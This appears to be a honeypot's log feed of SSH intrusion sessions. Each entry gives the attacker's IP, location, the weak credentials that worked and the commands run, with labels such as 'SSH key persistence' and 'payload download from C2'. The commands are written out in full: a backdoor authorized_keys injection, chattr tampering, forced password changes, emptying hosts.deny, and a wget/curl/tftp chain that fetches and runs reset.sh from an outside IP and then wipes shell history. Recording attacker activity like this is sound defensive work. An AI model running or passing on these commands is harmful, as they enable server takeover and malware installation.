$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 yankee_root_13 (20.55.117.89) — Boydton, United States · 2 sessions · 2 cmds

2026-04-21 13:52 EDT · as root/123456, root/12345678

netstat → hostname discovery

$ netstat -tulpn | head -10

$ hostname

↳ hostname discovery

🎭 ghost_root_48 (103.52.152.101) — Mong Kok, Hong Kong · 1 session · 2 cmds

2026-04-21 13:18 EDT · as oracle/Oracle08!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 ghost_root_33 (160.187.240.90) — Phu Do, Vietnam · 1 session · 2 cmds

2026-04-21 13:07 EDT · as oracle/Oracle08!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 gouda_root_5 (176.65.148.154) — Eygelshoven, Netherlands · 1 session · 1 cmd

2026-04-21 12:45 EDT · as root/root

payload download from C2

$ (cd /tmp && (wget http://176.65.148.112/AiMl/reset.sh -O .d 2>/dev/null || curl -s http://176.65.148.112/AiMl/reset.sh -o .d 2>/dev/null || tftp -g -r .d -l .d http://176.65.148.112/AiMl/reset.sh 2>/dev/null) && chmod +x .d && ./.d); history -c 2>/dev/null; > ~/.bash_history 2>/dev/null || (cd /var/run && (wget http://176.65.148.112/AiMl/reset.sh -O .d 2>/dev/null || curl -s http://176.65.148.112/AiMl/reset.sh -o .d 2>/dev/null || tftp -g -r .d -l .d http://176.65.148.112/AiMl/reset.sh 2>/dev/null) && chmod +x .d && ./.d); history -c 2>/dev/null; > ~/.bash_history 2>/dev/null || (cd /dev/shm && (wget http://176.65.148.112/AiMl/reset.sh -O .d 2>/dev/null || curl -s http://176.65.148.112/AiMl/reset.sh -o .d 2>/dev/null || tftp -g -r .d -l .d http://176.65.148.112/AiMl/reset.sh 2>/dev/null) && chmod +x .d && ./.d); history -c 2>/dev/null; > ~/.bash_history 2>/dev/null || (cd /root && (wget http://176.65.148.112/AiMl/reset.sh -O .d 2>/dev/null || curl -s http://176.65.148.112/AiMl/reset.sh -o .d 2>/dev/null || tftp -g -r .d -l .d http://176.65.148.112/AiMl/reset.sh 2>/dev/null) && chmod +x .d && ./.d); history -c 2>/dev/null; > ~/.bash_history 2>/dev/null || (cd / && (wget http://176.65.148.112/AiMl/reset.sh -O .d 2>/dev/null || curl -s http://176.65.148.112/AiMl/reset.sh -o .d 2>/dev/null || tftp -g -r .d -l .d http://176.65.148.112/AiMl/reset.sh 2>/dev/null) && chmod +x .d && ./.d); history -c 2>/dev/null; > ~/.bash_history 2>/dev/null

↳ payload download from C2

🎭 lantern_root_9 (118.145.235.60) — Haidian, China · 1 session · 20 cmds

2026-04-21 12:34 EDT · as oracle/Oracle08!

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "Oracle08!\nczcWZ2eKKNrA\nczcWZ2eKKNrA"|passwd|bash

$ Enter new UNIX password:

$ echo "Oracle08!\nczcWZ2eKKNrA\nczcWZ2eKKNrA\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 ghost_root_49 (36.92.107.106) — Jakarta, Indonesia · 1 session · 2 cmds

2026-04-21 12:21 EDT · as oracle/Oracle08!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 tulip_sol_5 (45.156.87.99) — Eygelshoven, Netherlands · 35 sessions · 35 cmds

2026-04-21 11:34 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×35

🎭 bike_root_6 (4.180.183.246) — Amsterdam, Netherlands · 1 session · 1 cmd

2026-04-21 10:38 EDT · as root/root

mount

$ mount | head -5

🎭 dragon_root_10 (8.160.177.115) — Beijing, China · 1 session · 1 cmd

2026-04-21 09:19 EDT · as admin/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 silk_root_9 (112.74.189.236) — Shenzhen, China · 1 session · 1 cmd

2026-04-21 08:30 EDT · as root/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 dragon_root_11 (182.92.102.68) — Beijing, China · 2 sessions · 2 cmds

2026-04-14 21:16 EDT · as postgres/postgres, root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×2

↳ OS/kernel identification

🎭 wok_root_12 (139.196.27.86) — Shanghai, China · 3 sessions · 3 cmds

2026-04-09 06:20 EDT · as deploy/deploy, root/root, user/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×3

↳ OS/kernel identification

🎭 cosmo_pi (212.34.100.110) — Gus'-Khrustal'nyy, Russia · 2 sessions · 3 cmds

2026-04-20 22:30 EDT · as pi/raspberry

make executable → execute payload → execute from /tmp

$ cd /tmp && chmod +x fvMRaKYr && bash -c ./fvMRaKYr

↳ make executable

$ ./fvMRaKYr

↳ execute payload

$ scp -t /tmp/fvMRaKYr

↳ execute from /tmp

🎭 wok_root_13 (47.99.97.73) — Hangzhou, China · 2 sessions · 2 cmds

2026-04-18 06:04 EDT · as admin/123456, user/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×2

↳ OS/kernel identification

🎭 dutch_root (193.32.162.151) — Amsterdam, The Netherlands · 271 sessions · 271 cmds

2026-03-19 06:19 EDT · as admin/admin, admin/admin123, admin/password

Ran uname 79x across 79 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×271

↳ obfuscated system check

🎭 wok_root_14 (182.92.92.149) — Beijing, China · 1 session · 1 cmd

2026-04-20 04:18 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 shadow_pi (86.127.249.49) — Alcobendas, Spain · 2 sessions · 3 cmds

2026-04-20 02:54 EDT · as pi/raspberry

make executable → execute payload → execute from /tmp

$ cd /tmp && chmod +x iymvBvxY && bash -c ./iymvBvxY

↳ make executable

$ ./iymvBvxY

↳ execute payload

$ scp -t /tmp/iymvBvxY

↳ execute from /tmp

🎭 gouda_root_6 (130.12.180.16) — Amsterdam, Netherlands · 1 session · 4 cmds

2026-04-20 00:03 EDT · as root/root

OS/kernel identification → cat → busybox

$ uname -a

↳ OS/kernel identification

$ cat /proc/version 2>/dev/null; echo ---; cat /proc/1/cmdline 2>/dev/null; ls /opt/cowrie /home/cowrie /home/kippo 2>/dev/null

$ busybox ECHOTEST 2>/dev/null || /bin/busybox ECHOTEST 2>/dev/null || /usr/bin/busybox ECHOTEST 2>/dev/null

$ cat /proc/meminfo 2>/dev/null | head -5; echo ===CORES===; nproc 2>/dev/null || grep -c '^processor' /proc/cpuinfo 2>/dev/null; echo ===MODEL===; grep -m1 'model name' /proc/cpuinfo 2>/dev/null || grep -m1 'Hardware' /proc/cpuinfo 2>/dev/null || grep -m1 'cpu model' /proc/cpuinfo 2>/dev/null; echo ===OS===; grep PRETTY_NAME /etc/os-release 2>/dev/null || cat /etc/issue 2>/dev/null | head -1; echo ===UP===; uptime 2>/dev/null || cat /proc/uptime 2>/dev/null

🎭 ghost_root_50 (217.182.78.185) — Warsaw, Poland · 1 session · 1 cmd

2026-04-19 19:40 EDT · as root/1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 ghost_root_3 (101.36.107.152) — Hong Kong, Hong Kong · 105 sessions · 105 cmds

2026-04-04 06:48 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×105

🎭 jade_root (120.48.199.28) — Beijing, China · 125 sessions · 125 cmds

2026-03-20 20:35 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 62x across 62 sessions — automated OS fingerprinting.

$ uname -s -v -n -r-m ×125

🎭 bike_root_2 (45.156.87.209) — Eygelshoven, Netherlands · 6 sessions · 6 cmds

2026-04-19 02:09 EDT · as root/1234, root/123456, root/12345678

hostname discovery → OS/kernel identification → env → history snooping → ps → uptime check

$ hostname

↳ hostname discovery

$ uname -a

↳ OS/kernel identification

$ env | head -10

$ history | tail -5

↳ history snooping

$ ps aux | head -10

$ uptime

↳ uptime check

🎭 rogue_root_33 (90.181.173.168) — Tuchoměřice, Czechia · 1 session · 1 cmd

2026-04-19 12:51 EDT · as guest/guest

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 shadow_root_27 (41.82.52.124) — Dakar, Senegal · 1 session · 19 cmds

2026-04-19 12:15 EDT · as oracle/Passw0rd

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "Passw0rd\ngh46rZbhw2xR\ngh46rZbhw2xR"|passwd|bash

$ Enter new UNIX password:

$ echo "Passw0rd\ngh46rZbhw2xR\ngh46rZbhw2xR\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 cipher_root_42 (8.217.107.107) — Hong Kong, Hong Kong · 1 session · 1 cmd

2026-04-19 12:09 EDT · as postgres/postgres

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 k-pop_root_2 (106.251.244.178) — Yongin-si, South Korea · 1 session · 2 cmds

2026-04-19 11:51 EDT · as oracle/Passw0rd

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 dragon_root_12 (101.201.233.222) — Beijing, China · 1 session · 1 cmd

2026-04-19 09:01 EDT · as oracle/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 strudel_root_7 (194.164.59.59) — Berlin, Germany · 1 session · 2 cmds

2026-04-19 08:28 EDT · as oracle/oracle12

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 pretzel_root_4 (5.231.208.117) — Bad Homburg, Germany · 1 session · 1 cmd

2026-04-19 05:22 EDT · as root/root

privilege check

$ whoami

↳ privilege check

🎭 phantom_root_25 (104.244.74.84) — Roost, Luxembourg · 1 session · 2 cmds

2026-04-19 05:21 EDT · as oracle/Oracle$

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 ghost_root_51 (217.154.186.165) — Madrid, Spain · 1 session · 1 cmd

2026-04-19 02:18 EDT · as oracle/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 lantern_root_10 (47.94.4.180) — Beijing, China · 1 session · 1 cmd

2026-04-19 00:59 EDT · as oracle/oracle@1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 silk_root_10 (182.92.7.159) — Beijing, China · 1 session · 1 cmd

2026-04-19 00:54 EDT · as oracle/Oracle@123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 wok_root_15 (121.229.27.155) — Hangzhou, China · 1 session · 2 cmds

2026-04-18 21:44 EDT · as oracle/testoracle

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 blitz_sol_2 (159.65.115.83) — Frankfurt am Main, Germany · 2 sessions · 2 cmds

2026-04-18 21:30 EDT · as sol/sol, solana/solana

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×2

↳ obfuscated system check

🎭 tea_root_6 (196.199.40.4) — City of London, United Kingdom · 1 session · 2 cmds

2026-04-18 21:20 EDT · as oracle/oracle8

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 ghost_root_24 (185.113.139.51) — Riga, Latvia · 2 sessions · 4 cmds

2026-04-04 20:13 EDT · as oracle/11111111, oracle/Welcome1

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 moose_root_4 (23.111.75.127) — Vancouver, Canada · 1 session · 19 cmds

2026-04-18 17:42 EDT · as root/123qweasdZXC

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:s3Ceh3C01LMl"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 panda_root_6 (117.50.213.145) — Beijing, China · 1 session · 1 cmd

2026-04-18 12:31 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 dragon_db_2 (180.184.82.249) — Haidian, China · 1 session · 2 cmds

2026-04-18 11:37 EDT · as oracle/oracle5

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 cipher_root_43 (187.212.38.18) — Puebla City, Mexico · 1 session · 19 cmds

2026-04-18 11:06 EDT · as root/toor

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:K1WRxDTdYKXy"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 seoul_root_2 (121.168.139.251) — Suwon, South Korea · 1 session · 2 cmds

2026-04-18 09:36 EDT · as oracle/Bmw_20!_^

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

